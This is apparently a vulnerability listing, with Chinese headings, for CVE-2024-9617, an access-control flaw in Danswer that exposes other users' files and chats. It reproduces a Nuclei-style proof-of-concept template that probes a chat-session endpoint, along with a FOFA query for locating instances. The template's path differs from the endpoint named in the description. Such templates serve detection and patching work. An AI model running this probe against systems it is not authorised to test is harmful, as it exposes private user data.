漏洞描述
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
CVE-2024-9617: Danswer - Insecure Direct Object Reference
PoC代码[已公开]
id: CVE-2024-9617
info:
name: Danswer - Insecure Direct Object Reference
author: s4e-io
severity: medium
description: |
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
reference:
- https://huntr.com/bounties/8f683ff6-3a99-41c6-b763-a8f7b73bd146
- https://github.com/danswer-ai/danswer
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-9617
cwe-id: CWE-284
epss-score: 0.12336
epss-percentile: 0.93645
metadata:
verified: true
max-request: 1
vendor: danswer-ai
product: danswer
fofa-query: icon_hash="484766002"
tags: cve,cve2024,danswer,idor
http:
- method: GET
path:
- "{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "chat_session_id", "description", "persona_id")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220646c2034ed6af48f287d84e10aa1a62ad918369a9a5feb267a5680e0c0727cdd022061a252a15cd2aaf8934cef759b21ba1349bc5e96ca9819d728a62fdcd3fd32fd:922c64590222798bb761d5b6d8e72950